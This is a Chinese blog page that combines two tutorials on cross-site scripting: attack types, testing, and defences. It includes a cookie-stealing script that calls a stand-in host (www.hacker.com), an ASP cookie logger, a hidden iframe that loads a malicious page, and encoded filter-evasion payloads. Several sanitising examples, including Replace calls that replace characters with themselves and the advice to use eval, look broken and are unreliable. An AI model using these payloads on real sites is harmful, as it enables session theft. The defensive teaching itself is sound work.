跨站脚本攻击(XSS)的原理、防范和处理方法

0。关键字:XSS,跨站脚本攻击,原理分析,攻击方式,防范,检查,恶意代码,蠕虫
 
1。概念
 
以下概念摘抄自百度百科:
 
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
 
2。生效方式
 
1)构造URL
 
XSS攻击者通过构造URL的方式构造了一个有问题的页面;当其他人点击了此页面后,会发现页面出错,或者被暗中执行了某些js脚本,这时,攻击行为才真正生效。
 
一般来说,动态页面中会将url中的部分内容回写在页面中。以百度的搜索为例:
 
http://www.baidu.com/s?wd=<script>alert("wrong")<%2Fscript>
 
参数<script>alert("wrong")<%2Fscript>是<script>alert("wrong")</script>转义后的结果,搜索结果页中,会在标题中中和搜索框中回写用户输入的内容。从页面的源代码中,我们看到,这两处本应该显示用户输入内容<script>alert("wrong")</script>的地方,实际也经过了转义处理,变成了<script>alert("wrong")</script>。如果这里没有经过转义处理,则页面中就嵌入了一段script,会执行,并弹出对话框提示用户。如果是其他恶意代码,则可能造成破坏。
 
然后攻击者将此URL广为传播——比如说,以报错的方式发给百度的管理员,管理员打开这个URL就中招了。
 
2)发布内容式
 
构造URL攻击方式传播范围有限,被攻击者只要有基本的安全意识就可以避免,因此这种手段的危险性比较小。相比之下,通过发表内容构造的XSS的危害就大了很多。
 
在可以发表内容的 论坛、讨论区、吧、博客、微博等网站上,用户发表的内容会保存起来,允许其他用户浏览。这些保存的内容显示在页面上的时候,如果没有经过正确的处理,也会把攻击者精心构造的内容显示出来,访问该内容的用户就此中招。如果该页面流传广泛,则影响会更加深远。
 
一般来说,这种攻击都做得比较隐蔽,被攻击者并不知道自己什么时候踩中了地雷;网站也很难追查问题的来源。
 
3)蠕虫式
 
上述两种方式的流传范围都有一定限度;最彻底最暴力的方式是使用蠕虫——就是首先发一个有问题的文章,浏览者 阅读时会被暗中执行恶意代码,发表一篇新的文章的,该文章也含有同样的恶意代码。这样有可能在最快时间内将攻击铺满整个网站。蠕虫式攻击将暗中偷偷摸摸的攻击行为变成了光明正大的攻城拔寨,极容易被发现和修复。
 
下面是6月28日新浪微博被蠕虫攻击的报告,其实质就是XSS攻击。
 
http://www.ijinshan.com/news/20110629001.s html
 
3。破坏方式
 
1)破坏页面结构
 
用户输入的内容包含了html的标签,与前面的标签等闭合,导致页面的DIV结构发生变化,页面错乱。
测试
测试
 
用户输入的内容包含了单引号或双引号,与前面的单引号或双引号匹配,导致后面的内容丢失,显示不出来。
 
 
可以使用php内置方法htmlspecialchars来处理待输出的内容,将上述字符转义。
 
综合1)和2)两者需要处理的内容基本是一样的,而多转义并不会带来副作用,因此可以使用统一的处理方法
 
$out = htmlspecialchars($out,ENT_QUOTES)
 
注意第二个参数是明确要求将双引号进行转义。
 
3)JS
 
将要输出到js代码片断中的用户输入内容没有好的办法进行处理;仅转义少数字符不能保证去掉所有的攻击可能。
 
因此,一般建议不要把用户产生的内容直接输出到js片断中。
 
如果条件所限,必须将内容直接输出,有如下方法可供选择:
 
a) 如果待输出的内容有特定的取值返围或者特定的格式,可以使用白名单或者正则表达式进行处理。
 
b) 可以将内容输出到html的隐藏标签或隐藏表单中,js通过获取标签的内容得到该内容。
 
c) 使用json_encode将内容编码后输出到页面上,页面上使用eval将内容取出来。
 
5。检查
 
那么,对已有的页面,该如何检查呢?
 
这个问题的回答是,目前没有很好的办法能完全检查出可能存在xss攻击的页面;有一些办法可以检查出比较明显的疏漏,其基本思路如下:
 
1)从apache的access_log中取出所有unique的请求,依次修改其某一个参数为 "<script>alert('xx')</script>",发起请求;
 
2)获取返回的内容,如果内容中有原样的该字符串,表明此可疑输入没有经过处理便输出到页面上,页面存在隐患,需要处理。
 
通过这种办法,可以检查出绝大多数能通过get请求发起的xss攻击。那些在access_log没有出现的请求参数,这里没有检查到,可能有所遗漏,就需要手动去整理,测试。
 
通过Post发起的请求需要用另外一种策略进行检查。其思路如下:
 
将网站上所有可以输入的表单,依次输入特征字符串,比如说<'">,如果提交后产生的页面中含有未处理的此字符串,说明存在隐患。





4 防范方法 
   
  4.1针对常规跨站漏洞 
  在常规的跨站漏洞中,正是因为攻击者可以不受限制地引入“<>”,导致了他可以操纵一个 html标记,从而诱发了XSS攻击。因此首先就要过滤掉“<>”: 
  Replace(str,”<”,”<”) 
   Replace(str,”>”,”>”) 
  4.2针对UBB跨站漏洞 
  UBB跨站漏洞的防范相对来说比较复杂,首先攻击者必须引入javascript或vbscript代码来达到攻击的目的,所以首先要过滤中javascript后面的冒号,将其用中文的冒号替代: 
  Replace(str,”:”,”:”) 
  但是HTML支持&#ASCII这样的编码,攻击者又可以通过重新达到目的(58是冒号的十进制ASCII码),所以必须过滤&符号: 
  Replace(str,”&”,”&”) 
   以上虽然已经过滤了来自标签属性的威胁,攻击者还是可以通过触发一个错误事件来达到目的。所以还需过滤掉以下字符: 
  Replace(str,” ”,” ”)//过滤空格 
  Replace(str,”=”,”=”)//过滤等号 
  Replace(str,””””,”"”)//过滤双引号 
   
  5 结束语 
   
  通过以上分析我们看到,XSS是一种危害较大、较难防范,并且更加隐蔽的攻击方式。其实只要明白其原理,再加上勤加思考防范的对策,就可以根治XSS漏洞
















XSS跨站脚本攻击原理的检测与防范

 

1.前言。

XSS夸站在这个圈子里几乎成了最常见的web攻击手法了,特别是这个网络飞速发展的今天。业界不段的爆出各程序的XSS。经过前段时间的检测,发现中国联通主站也存在着XSS,这业界的安全真是让人担心呢,以后会发展成什么样子谁也不能预计。我们能做的就是不断的提高本身的的安全知识去应对着层出不穷的安全隐患。

2 跨站脚本漏洞介绍
2.1 什么是跨站脚本漏洞
跨站脚本漏洞(Cross Site Scripting,常简写作XSS)是Web应用程序在将数据输出到网页的时候存在问题,导致攻击者可以将构造的恶意数据显示在页面的漏洞。因为跨站脚本攻击都是向网页内容中写入一段恶意的脚本或者HTML代码,故跨站脚本漏洞也被叫做HTML注入漏洞(HTML Injection)。
与SQL注入攻击数据库服务器的方式不同,跨站脚本漏洞是在客户端发动造成攻击,也就是说,利用跨站脚本漏洞注入的恶意代码是在用户电脑上的浏览器中运行的。
2.2 跨站脚本漏洞的危害
跨站脚本攻击注入的恶意代码运行在浏览器中,所以对用户的危害是巨大的——也需要看特定的场景:跨站脚本漏洞存在于一个无人访问的小站几乎毫无价值,但对于拥有大量用户的站点来说却是致命的。
最典型的场景是,黑客可以利用跨站脚本漏洞盗取用户Cookie而得到用户在该站点的身份权限。据笔者所知,网上就有地下黑客通过出售未公开的GMail、雅虎邮箱及hotmail的跨站脚本漏洞牟利。
由于恶意代码会注入到浏览器中执行,所以跨站脚本漏洞还有一个较为严重的安全威胁是被黑客用来制造欺诈页面实现钓鱼攻击。这种攻击方式直接利用目标网站的漏洞,比直接做一个假冒网站更具欺骗性。
另外,控制了用户的浏览器,黑客还可以获取用户计算机信息、截获用户键盘输入、刺探用户所处局域网信息甚至对其他网站进行GET Flood攻击。目前互联网已经有此类利用跨站脚本漏洞控制用户浏览器的黑客工具出现。
当然,虽然跨站脚本攻击是在客户端浏览器进行,但是最终也是可以攻击服务器的。笔者就曾在安全测试过程中就利用某Blog程序的跨站脚本漏洞得到网站管理员身份并最终控制Web服务器。
2.3 跨站脚本漏洞的产生
跨站脚本漏洞是如何产生的呢?
大部分Web漏洞都源于没有处理好用户的输入,跨站脚本也不例外。
请看以下一段PHP代码:
< ?PHP
echo "欢迎您,".$_GET['name'];
?>
稍微解释一下,这段PHP代码的意思是在页面输出字符串“欢迎您,”和URL中name参数的值,比如用浏览器访问这个文件:http://localhost/test23.php?name=lakehu,页面上就会出现“欢迎您,lakehu”字样。其中lakehu是我们通过URL中的参数name传入的,name的值就是用户的输入。

我们知道,浏览器对网页的展现是通过解析HTML代码实现的,如果我们传入的参数含有HTML代码呢?对,浏览器会解析它而不是原封不动的展示——这个就与Web应用程序的设计初衷相反吧。
这样通过参数访问刚才的PHP页面:http://localhost/test23.php?name=lake<s>hu</s>,你将看到HTML标记被浏览器解释了:

变本加厉的,如果传入一段脚本<script>[code]</script>,那么脚本也会执行。用这样的URL将会执行JavaScript的alert函数弹出一个对话框:http://localhost/test.php?name=lake<script>alert(123456)</script>

通过上面简单的示例我们已经知道,Web应用程序在处理用户输入的时候没有处理好传入的数据格式就会导致脚本在浏览器中执行,这就是跨站脚本漏洞的根源。
2.4 跨站脚本漏洞的分类
2.4.1 非持久型XSS
非持久型XSS(Non-persistent)又叫做反射XSS(Reflect XSS),它是指那些浏览器每次都要在参数中提交恶意数据才能触发的跨站脚本漏洞。
前一节演示的XSS漏洞属于这种类型,因为每次我们都是需要向参数name中提交恶意数据来实现跨站脚本攻击。
一般来说,凡是通过URL传入恶意数据的都是非持久型XSS。当然,也有通过表单POST的XSS例子:
< ?PHP
echo "欢迎您,".$_POST['name'];
?>
Web应用程序获取的参数name已经由GET变为POST了,要触发这个XSS漏洞就要稍微复杂一点,我们需要写一个网页:
<form action="http://localhost/test.php" method="post">
< input name="name" value="<script>alert(123456)</script>" type="hidden" />
< input name="ss" type="submit" value="XSS提交测试" />
< /form>
点击“XSS提交测试”按钮,你就又会看到浏览器弹出了可爱的对话框?
2.4.2 持久型XSS
持久型XSS(Persistent)又叫做存储XSS(Stored XSS),与非持久型XSS相反,它是指通过提交恶意数据到存储器(比如数据库、文本文件等),Web应用程序输出的时候是从存储器中读出恶意数据输出到页面的一类跨站脚本漏洞。
看个例子。
下图是某BBS程序没有处理发帖正文中的恶意代码就直接存储到数据库中:

然后读帖子的时候程序从数据库中读出数据,结果数据中含有的恶意代码在浏览器执行了(此处仅演示弹出对话框):

这个漏洞是由于程序会把UBB代码[IMG]javascript:alert('XSS')[/IMG]转换成HTML代码:
<img src="javascript:alert('XSS')" /> IE6会解析上面的HTML代码并执行img标签src属性中的JavaScript代码,导致XSS的发生。
持久型XSS多出现在Web邮箱、BBS、社区等从数据库读出数据的正常页面(比如BBS的某篇帖子中可能就含有恶意代码),由于不需要浏览器提交攻击参数,所以其危害往往大于非持久型XSS。
2.5 跨站脚本漏洞的出现场景
根据数据输出的不同,跨站脚本漏洞一般会出现在以下4个地方,了解了漏洞出现的场景,对我们认识和修复漏洞是有积极意义的。
2.5.1 输出在HTML页面
前面2.3节的PHP代码就是把数据输出到HTML页面的例子。这种情况比较简单,就是把传入的参数值直接显示在页面,主要就是传入的参数中带有“<”和“>”符号会被浏览器解析。
2.5.2 输出在HTML属性中
看这样一段代码:
< ?PHP
echo "<a href=\"".$_GET['name']."\">Enter</a>";
?>
这段PHP代码的意思就是把得到的name参数输出到一段HTML标记的A标签中,假设name的值是test,那么你将得到这样的页面:
<a href="test">Enter</a>
这时我们再武断地给name附上“test<script>alert(123456)</script>”是不会造成XSS攻击的,因为脚本会被浏览器认为是href的值,这时候需要稍微动点脑子才行:http://localhost/test2521.php?name=test">Hi</a><script>alert(123456)</script><!--
得到这样的页面:
<a href="test">Hi</a><script>alert(123456)</script><!—">Enter</a>
请注意,蓝色字体为PHP程序输出,而红色字体是我们提交的参数。哈哈,我们提交的“">”和“</a>”闭合了原来的A标签,然后跟上JavaScript代码,之后的A标签的后部分被<--注释掉了。
以上就是传入数据输出到属性中的情况,关键点是我们提交的数据能够闭合属性标签。这个例子是双引号,其实属性也是可以用单引号甚至不用引号的(如果属性的值中没有空格的话就可以不需要引号),道理都是一样的,只要闭合它们就可以了。
2.5.3 输出在JavaScript代码中
JavaScript和HTML结合紧密,所以有时候程序员们就会把参数输出到JavaScript代码中:
< ?PHP
echo "<script>";
echo "var yourname = '".$_GET['name']."';";
echo "</script>";
?>
分析PHP代码输出的页面,我们很容易构造出XSS攻击测试URL:http://localhost/test2531.php?name=a';alert(123456);//
实际上是我们利用单引号闭合了JavaScript代码的变量赋值,然后再执行我们的alert函数(因为PHP5在默认情况下是会自动对传入的单引号转义的,这里只是为了演示,所以我们认为此处单引号不被转义。即假设PHP的magic_quote_gpc为Off)。
得到的返回页面是这样的:
<script>
var yourname = 'a';alert(123456);//';
< /script> 然后你又看到那个显示123456表示脚本被执行的演示对话框了。
同样的道理,如果是用的双引号做变量赋值就需要传双引号进去破坏掉原来的JavaScript代码。
2.5.4 基于DOM
DOM是Document Object Model(文档对象模型)的缩写。据W3C DOM规范(http://www.w3.org/DOM/),DOM是一种与浏览器,平台,语言无关的接口,使得你可以访问页面其他的标准组件。
简单理解,我们把DOM认为是JavaScript输出的页面,基于DOM的跨站脚本漏洞就是出现在JavaScript代码中的漏洞。请注意,之前的3种输出是属于Web应用程序(CGI程序)代码中的漏洞。
是的,你没有看错,含有JavaScript静态HTML页面也可能会存在XSS漏洞。
以下是一段存在DOM类型跨站脚本漏洞的代码:
<script>
document.write(window.location.search);
< /script>
在JS中window.location.search是指URL中?之后的内容,document.write是将内容输出到页面。于是乎,又是一个直接输出到页面的跨站脚本漏洞。好,来构造攻击URL:http://localhost/test2541.php?<script>alert(123456)</script>

但是查看网页源代码,源代码却没变:

这就是DOM,在浏览器的解析中改变页面结构。这种特性检测DOM的跨站脚本漏洞带来了一点麻烦,因为它不能通过页面源代码来判断漏洞,给自动化漏洞检测带来了挑战。

3 跨站脚本漏洞检测技术
3.1 黑盒测试
黑盒测试是指在不知道源代码的情况下通过各种技术手段对Web应用程序进行的探测,这个就是从黑客的视角去发现问题。
3.1.1 测试原理
测试跨站脚本漏洞的原理很简单,就是我们尝试提交可能有问题的数据,然后分析返回页面。
一般是修改参数值为一个标志字符串,然后搜索页面是否含有该字符串。如果有,说明页面会把参数输出。接着就是分析返回页面构造攻击参数,前面2.5提到了4种场景,根据不同的场景有不同的攻击参数。
以2.3节中的代码为例,要测试这个URL,我们就先提交http://localhost/test23.php?name=XSSTest,然后在返回的页面中搜索到字符“XSSTest”,说明name参数的值是直接输出到页面的。接着我们分析页面,发现name参数的值是直接输出到页面的,所以跟着提交一个含有HTML标记的字符串:http://localhost/test23.php?name=<b>XSS< /b>,返回页面中仍然发现有“<b>XSS</b>”,而且页面中的“<b>XSS</b>” 已经被浏览器解析,至此,可以判断该URL存在跨站脚本漏洞。

对于DOM跨站脚本漏洞的测试,就不能搜索页面源代码是否含有传入的标志字符串了,稍微复杂一点,可能需要阅读JavaScript代码、观察页面内容并查看页面是否出现JavaScript代码异常等行为。常见的出问题的代码是eval、 document.write、document.writeln、window.exeScript、标签的innerHTML属性、标签的src属性。
3.1.2 常用测试用例
因为跨站脚本漏洞是在浏览器中执行的,而各个浏览器对HTML标签及JavaScript解释有所不同,所以攻击代码其实就根据浏览器的不同而不同。
比如下面的HTML在IE6下会执行JavaScript弹出对话框,但是在IE7及Firefox下就不会执行:
<img src="javascript:alert(123456)" />
而且就上面一段测试用例就还有很多种变形,以下是一小部分:
<img src="javasc
ript:alert(123456)" />
回车分割

<img src="jav ascript:alert(123456)" />
Tab分割

<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;
& #58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;123456&#39;&#41;>
面对XSS漏洞的那么多用例和变形,是不是有些头晕了?呵呵,好在有个叫Rsnake的老外按照浏览器分类及变形归纳了一份XSS测试手册(XSS Cheat Sheet),你可以去他的网站找到它:http://ha.ckers.org/xss.html

如图所示,XSS Cheat Sheet几乎归纳了所有的XSS利用形式及支持的浏览器,实在是XSS研究的最佳资料。
3.1.3 测试自动化——使用Web漏洞扫描器
当我们熟练了之后,测试就是体力活了,而且URL数量很多的话人工也忙不过来,所以我们要把测试工作自动化。
这个时候可以使用Web漏洞扫描器来实现对跨站脚本漏洞的检测,免费的软件有ProxyStrike、Paros、WebScarab等,商业的扫描器有 AppScan、WebInspect等,这些都是比较自动化进行Web漏洞测试的工具,有兴趣的同学可以google一把下载来试用。
当然,扫描器只是提高效率的工具,并不能完全代替手动测试,因为扫描器受到规则和技术的限制,可能会有误报甚至漏报。比如BBS发帖这种交互性很强的地方扫描器很难对其进行测试——人工测试还是必不可少的。
3.2 白盒测试
白盒测试就是阅读代码找漏洞了,这种测试方案适合公司内部以及开源项目。这种基于代码检测的方案也叫做代码审计(Code Audit)。
3.2.1 测试原理
简单的说,就是根据相关语言定义一些可能导致跨站脚本漏洞的函数(一般为输出函数),然后去找检查这些函数的参数是否由外部传入且未经过安全处理。
比如PHP,就是检查echo、print函数的参数是否来自外部并且没有经过防跨站处理就直接显示到页面;对ASP来说,就是response.write之类的输出函数。
比如这样的PHP代码就有问题:
< ?PHP
echo “欢迎您,”.$_GET[‘name’];
?>
这个时候就先定位echo函数,然后发现其输出的值来自外部($_GET[‘name’])而且未作安全处理。
其他的语言也是一样的道理。
3.2.2 测试自动化——使用代码审计工具
还是使用工具来提高效率,针对不同的语言,有不同的代码审计工具。比如微软提供的检查.Net代码跨站脚本漏洞的工具XSS Detect Beta Code Analysis Tool(http://www.microsoft.com/downloads/details.aspx?FamilyID=19a9e348- bdb9-45b3-a1b7-44ccdcb7cfbe&DisplayLang=en)就很不错。
这里主要是选择支持你要测试的Web应用程序开发语言的代码审计工具。

4 跨站脚本攻击技术
4.1 如何发动攻击
针对XSS漏洞的两种不同类型,利用方式也是不一样的。
4.1.1 非持久型XSS攻击
非持久型XSS漏洞实际上大多数攻击数据是包含在URL中的,类似这样的:http://www.vicitim.com/vul.asp?hi=[code]。
需要用户的浏览器访问到这个URL恶意代码才执行,攻击者一般会把URL发给用户让用户通过浏览器去访问。不过URL里面带有稀奇古怪的代码确实有点奇怪,为了掩人耳目,攻击者可以发一个看起来没问题的URL,再通过那个页面跳转到恶意的URL;甚至也可以让一个域名转向到恶意URL,把那个域名发给用户。
4.1.2 持久型XSS攻击
持久型XSS攻击就简单一点,只要第一次把攻击代码提交到服务器就一劳永逸了。
比如我在某个论坛发帖的时候,论坛没有对传入的HTML作处理,那么我就可以发一个帖子内容包含“<script>[code]</script>”的帖子。呵呵,然后就守株待兔地等着来看帖子的人执行恶意脚本了。
持久型XSS漏洞是把恶意脚本存储到了数据库,访问页面的时候完全没有预兆,所以它的危害也比非持久型XSS略微高一点。
4.2 常见攻击手法
4.2.1 盗取Cookie
Cookie是Web程序识别不同的用户的标识,如果得到某人的Cookie,黑客就可以以他的身份登陆网站了,所以跨站脚本攻击的第一个目标就是拿到它。想一想,如果是Web邮箱有一个XSS漏洞,当你查看一封邮件的时候,你的身份标识已经被别人拿到,黑客就可以自由出入你的邮箱了。
在JavaScript中可以使用document.cookie来获得当前浏览器的Cookie,所以我们一般是执行这样的代码来获得Cookie并发送到某个地方记录之:
<script>
document.write("<img src=http://www.hacker.com/getcookie.asp?c="+escape(document.cookie)+">");
< /script> 这段代码就是输出img标签并访问黑客的Web服务器的一个ASP程序。注意,这里是把当前的Cookie作为参数发送出去了哦(为了避免出现特殊字符,这里使用了escape函数对Cookie进行URL编码)。我们看看抓包的结果:

然后在www.hacker.com上的getcookie.asp需要记录传入的参数(就是受害用户的Cookie啦),代码是这样的:
< %
if Request("c")<>"" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.OpenTextFile(server.mappath("a.txt"),8,True)
outfile.WriteLine Request("c")
outfile.close
Set fs = Nothing
end if
%>
一旦有cookie发过来,ASP程序就会把cookie写入到当前目录的a.txt文件中。
有了Cookie,黑客就可以找一个自定义Cookie的浏览器以用户身份访问Web了。
4.2.2 盗取Cookie升级版——保持会话
前面一节讲的黑客可以记录Cookie,是的,存储型Cookie倒没问题,但是如果是会话型Cookie(也就是Session)的话,过一段时间如果用户不访问页面Session也就失效了。
为了解决Session时效性的问题,所以出现了实时记录Cookie并不断刷新页面保持Session的程序——SessionKeeper:

这个工具的原理是得到用户Cookie后会自动模拟浏览器提交请求不断刷新页面以维持Session的存在。
4.2.3 页面劫持——挂马和钓鱼攻击
当然,黑帽子黑客之所以是黑帽子的原因是经济动力,所以跨站脚本攻击也会被他们利用来为自己产生经济效益。
挂马和钓鱼是两个最好不过的生财之道了。
所谓挂马就是在网页中添加一些恶意代码,这些代码是利用了浏览器及ActiveX控件的漏洞进行攻击的。如果你的机器上不幸存在这些漏洞,那你访问到这个页面的时候你就中木马了。在挂马行业,中你木马的人越多,你的收益就越高。
在XSS的攻击代码中,需要用iframe或者script甚至弹出窗口引入含有网页木马的恶意代码网页/文件。类似的代码(http://hacker是一个包含恶意代码的页面):
<iframe width="0" height="0" src="http://hacker"></iframe>
钓鱼攻击(Phishing Attack)我想大家都看到过,就是经常在QQ、QQ游戏、空间等地方看到的中奖信息。利用XSS漏洞的钓鱼更加隐蔽且更具欺骗性。
因为JavaScript脚本功能强大,我们可以利用它来更改整个页面内容,所以我们就可以制造出利用真的目标域名的假页面:

其实只是一个XSS引入JavaScript代码修改了页面元素而已:

原来的页面:

4.2.4 XSS蠕虫的故事
我们把那种感染能进行自我复制和传播的病毒叫做蠕虫病毒。当年攻击机器无数、造成巨大破坏的的冲击波、震荡波病毒就是蠕虫病毒。这些传统的蠕虫病毒是依靠远程缓冲区溢出进行传播,在Web2.0时代,蠕虫病毒可以利用跨站脚本漏洞进行传播。
百度空间在07年圣诞就遭到过XSS蠕虫的传播。
当时百度空间自定义CSS的地方过滤不严导致出现一个持久型XSS漏洞。2007年12月25日晚,有黑客写出了利用这个漏洞进行XSS攻击并自我传播的 JavaScript恶意代码。感染该蠕虫的空间将会在空间中存在恶意代码并修改访问该空间的其他百度空间用户的CSS植入XSS攻击代码,还会向好友发送消息诱骗好友来访问中毒的空间。截至26日晚7点百度空间找到原因并修复漏洞,有大于8000个用户空间感染了蠕虫代码。

幸好百度空间及时发现蠕虫并修复漏洞,随着时间的增加,被感染的空间将以几何级增长。由此可见,一旦在业务爆发XSS蠕虫将给业务带来巨大的损失。

5防御跨站脚本攻击
5.1 编写安全的代码
经过第二章我们知道,跨站脚本漏洞是由于程序在输出数据的时候没有作好处理导致恶意数据被浏览器解析造成的。所以,对付XSS漏洞最好的办法就是编写安全的代码。
5.1.1 安全的处理数据
第二章中提到跨站脚本漏洞出现的几个场景,我们只要在输出数据的时候处理按输出的场景好数据就可以了。
直接输出在页面的数据需要对“<”、“>”HTML编码:
< 编码为 &lt;
> 编码为 &gt;
输出在HTML属性中的数据不能让属性值被闭合。用双引号(")表示的属性需要编码属性值中的双引号:
" 编码为&quot;
用单引号(')表示的属性需要编码属性值中的单引号:
' 编码为&#39;
输出到页面JavaScript中的代码也要注意编码。这个要视具体情况而定,比如2.5.3中提到的PHP代码:
< ?PHP
echo "<script>";
echo "var yourname = '".$_GET['name']."';";
echo "</script>";
?>
实际上需要用单引号(')闭合JavaScript代码,这里就需要按照JavaScript的语法把单引号转义:
' 转义为 \'
这样就无法通过传入单引号来闭合代码了。但是还是可以利用传入“</script>”来闭合整个script标签(在JavaScript语法中,</script>闭合标签总是优先):
<script>
var yourname = 'a</script><script>alert()//';
< /script> 所以我们还编码传入的“<”和“>”。
前面还提到的IE6下img标签的XSS漏洞:
<img src="javascript:alert(123456)" />
这里就要限制img标签的src属性始终以http://或https://开头(白名单匹配)。
OK,我们总结一下,防御跨站脚本漏洞的安全编码工作主要是编码输出在页面中会破坏原有代码(HTML、JavaScript甚至WML等)规则的特殊字符以及对某些标签的某些属性进行白名单检查。
5.1.2 提高攻击门槛
跨站脚本攻击的主要目标之一是盗取Cookie,所以我们可以利用浏览器的安全特性来防御Cookie的盗取。注意一点,本节内容只是在存在XSS攻击的情况下减小XSS攻击的危害并提高攻击门槛,并不能完全防止XSS攻击——杜绝XSS攻击的根源还是安全的编码。
一般来说,公司的站点很多,单独的业务就可以在子域下设置自己的cookie,而不需要别的子域使用你的cookie。比如show.qq.com的 cookie就不需要在其他域下使用。这样的话,我们可以通过设置cookie的作用域来减少cookie的暴露面。在HTTP响应头的Set- Cookie字段设置域限制:
Set-Cookie: a=123; domain=show.qq.com
这样“a=123”就只有在show.qq.com下才能访问了。
同理,甚至我们可以限制cookie在某一子域名某个目录下存在,在别的目录将无法访问这个cookie:
Set-C



  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值